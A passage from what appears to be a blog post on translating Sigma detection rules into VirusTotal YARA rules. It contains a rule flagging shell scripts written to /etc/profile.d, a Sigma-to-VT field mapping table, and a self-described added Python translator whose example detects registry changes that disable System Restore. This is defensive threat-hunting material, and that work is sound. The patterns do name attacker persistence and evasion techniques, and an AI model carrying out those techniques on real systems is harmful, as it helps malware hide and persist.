        for any file_path in vt.behaviour.files_written : (
            file_path contains "/etc/profile.d/"
            and ( file_path endswith ".sh" or file_path endswith ".csh" )
        )
}
</pre>
<br />
<br />
<h2>Summary of translating sigma to yara:</h2>
<p>
You may wish to review the
<a href="https://github.com/SigmaHQ/sigma-specification/" target="_blank">sigma specification</a>
and the
<a href="https://support.virustotal.com/hc/en-us/articles/360015738658-Sigma-rules" target="_blank">
sigma rules detected on VirusTotal</a> for further examples.
</p>
<p>Any data contained in the
<a href="https://developers.virustotal.com/reference/file-behaviour-summary" target="_blank">file behavior object</a>
can be matched on.
</p>
<p> The table below may help in guiding you to the correct keywords to use.</p>
<div align="center" dir="ltr" style="margin-left: 0pt;">
<table>
<thead>
<tr>
<th> Sigma Taxonomy</th>
<th> VirusTotal schema</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<ul>
<li>file_access
<ul>
<li>TargetFilename</li>
</ul>
</li>
<li>file_event
<ul>
<li>TargetFilename</li>
</ul>
</li>
<li>sysmon
<ul>
<li>EventID 11 (FileCreate)</li>
</ul>
</li></ul>
</td>
<td>
<ul>
<li>vt.behaviour.files_written[]</li>
<li>vt.behaviour.files_dropped[].path</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>registry_set</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.registry_keys_set[].key</li>
<li>vt.behaviour.registry_keys_set[].value</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>registry_delete</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.registry_keys_deleted[]</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>process_creation</li>
<li>ps_script</li>
<li>file_event
<ul>
<li>Image</li>
</ul>
</li></ul>
</td>
<td>
<ul>
<li>vt.behaviour.command_executions[]</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>network_connection
<ul>
<li>DestinationHostname</li>
</ul>
</li>
<li>dns_query
<ul>
<li>QueryName</li>
</ul>
</li>
<li>dns
<ul>
<li>query</li>
</ul>
</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.dns_lookups[].hostname</li>
<li>vt.behaviour.tls[].sni</li>
<li>vt.behaviour.memory_pattern_urls[]</li>
<li>vt.behaviour.memory_pattern_domains[]</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>file_delete</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.files_deleted[]</li>
</ul>
</td>
</tr>
</tbody>
</table>
</div>
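<p>The three examples above and the table all follow one pattern: pick the VT behaviour collection that corresponds to the Sigma logsource, loop over it with <code>for any</code>, and turn each Sigma field/modifier pair into a YARA string test. The script below is an added example (it is not VirusTotal's code and not part of this post) that mechanises that pattern for the categories in the table. It takes a Sigma rule already parsed into a Python dict, so it needs no YAML library, and it assumes the VT module attribute names exactly as the table lists them; the <code>CommandLine</code> field name for <code>process_creation</code> is an assumption taken from the Sigma taxonomy rather than from this post. It emits the literal Sigma semantics (<code>endswith</code> stays <code>endswith</code>, a plain value becomes <code>==</code>), so where the post's hand-written rules deliberately loosen a match because the sandbox report does not reproduce the Sysmon representation (hostnames matched with <code>contains</code>, the DWORD value reduced to <code>contains "1"</code>) you still review the output and adjust by hand.</p>

```python
# Added example (not VirusTotal code): minimal Sigma -> VT-module YARA translator
# covering the logsource categories in the table above and the string modifiers
# the post's examples use. Anything else raises so the gap is visible.
import re

# Sigma logsource category -> VT behaviour collections, from the table above.
# Each entry: (iterable, loop variable, {Sigma field: YARA expression}).
SOURCES = {
    "dns_query": [("vt.behaviour.dns_lookups", "lookup", {"QueryName": "lookup.hostname"})],
    "registry_set": [("vt.behaviour.registry_keys_set", "reg",
                      {"TargetObject": "reg.key", "Details": "reg.value"})],
    "file_event": [
        ("vt.behaviour.files_dropped", "dropped", {"TargetFilename": "dropped.path"}),
        # files_written is an array of strings: the loop variable is the path itself
        ("vt.behaviour.files_written", "path", {"TargetFilename": "path"}),
    ],
    # "CommandLine" is the Sigma field name; its VT mapping is an assumption here.
    "process_creation": [("vt.behaviour.command_executions", "cmd", {"CommandLine": "cmd"})],
}
# Fields already implied by the VT collection (registry_keys_set means a set event).
IMPLIED_FIELDS = {("registry_set", "EventType")}
OPERATORS = {"contains": "contains", "startswith": "startswith", "endswith": "endswith"}

def yara_str(value):
    """Quote a value as a YARA string literal; backslashes and quotes are escaped."""
    return '"' + str(value).replace("\\", "\\\\").replace('"', '\\"') + '"'

def value_test(expr, modifier, value):
    """One Sigma value plus modifier -> one YARA boolean expression."""
    value = str(value)
    if modifier is None:  # leading/trailing '*' wildcards become string operators
        if value.startswith("*") and value.endswith("*"):
            modifier, value = "contains", value[1:-1]
        elif value.startswith("*"):
            modifier, value = "endswith", value[1:]
        elif value.endswith("*"):
            modifier, value = "startswith", value[:-1]
    if "*" in value:
        raise NotImplementedError("inner wildcard needs a YARA regex: %r" % value)
    if modifier is None:
        return "%s == %s" % (expr, yara_str(value))
    if modifier not in OPERATORS:
        raise NotImplementedError("unsupported Sigma modifier: %s" % modifier)
    return "%s %s %s" % (expr, OPERATORS[modifier], yara_str(value))

def translate_source(iterable, var, fields, selection, category):
    """Build one 'for any VAR in ITERABLE : ( ... )' block for a Sigma selection."""
    clauses = []
    for key, values in selection.items():
        field, _, modifier = key.partition("|")
        if (category, field) in IMPLIED_FIELDS:
            continue
        if field not in fields:
            raise NotImplementedError("no VT mapping for %s.%s" % (category, field))
        values = values if isinstance(values, list) else [values]
        # Sigma semantics: values of one field are OR-ed, different fields AND-ed.
        clauses.append("(" + " or ".join(
            value_test(fields[field], modifier or None, v) for v in values) + ")")
    if not clauses:
        raise ValueError("selection has no translatable fields")
    return "for any %s in %s : (\n      %s\n    )" % (
        var, iterable, "\n      and ".join(clauses))

def sigma_to_vt_yara(rule):
    """Translate a parsed Sigma rule (dict) with 'condition: selection' to YARA."""
    category = rule["logsource"]["category"]
    if category not in SOURCES:
        raise NotImplementedError("unsupported logsource category: %s" % category)
    if rule["detection"].get("condition") != "selection":
        raise NotImplementedError("only 'condition: selection' is handled here")
    selection = rule["detection"]["selection"]
    loops = [translate_source(it, var, fields, selection, category)
             for it, var, fields in SOURCES[category]]
    name = re.sub(r"[^a-z0-9]+", "_", rule["title"].lower()).strip("_")
    meta = "sigma_id = %s\n    sigma_title = %s" % (
        yara_str(rule.get("id", "")), yara_str(rule["title"]))
    return 'import "vt"\n\nrule %s\n{\n  meta:\n    %s\n  condition:\n    %s\n}\n' % (
        name, meta, "\n    or ".join(loops))

# Constructed input: the post's "Registry Disable System Restore" detection
# logic as the dict yaml.safe_load() would produce from the rule file.
DISABLE_SYSTEM_RESTORE = {
    "title": "Registry Disable System Restore",
    "id": "5de03871-5d46-4539-a82d-3aa992a69a83",
    "logsource": {"category": "registry_set", "product": "windows"},
    "detection": {"condition": "selection", "selection": {
        "EventType": "Setvalue",
        "TargetObject|contains": ["\\Policies\\Microsoft\\Windows NT\\SystemRestore",
                                  "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore"],
        "TargetObject|endswith": ["DisableConfig", "DisableSR"],
        "Details": "DWORD (0x00000001)",
    }},
}

if __name__ == "__main__":
    print(sigma_to_vt_yara(DISABLE_SYSTEM_RESTORE))
```

<p>Feed the profile.d rule from Example 4 through the same function and you get the two <code>for any</code> loops joined by <code>or</code>, one over <code>files_dropped</code> and one over <code>files_written</code>, exactly the shape of the hand-written rule. Modifiers such as <code>re</code>, <code>base64offset</code> or <code>all</code>, and conditions that combine several selections, are rejected rather than guessed, which is the behaviour you want from a translator that feeds a hunting ruleset.</p>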
<br />
<br />
<p dir="ltr">
Malware threat hunting can be complex; by combining Sigma rules with YARA rules you can make the process more efficient and effective. Happy hunting.
</p>
<br />
</span>
Karl Hiramoto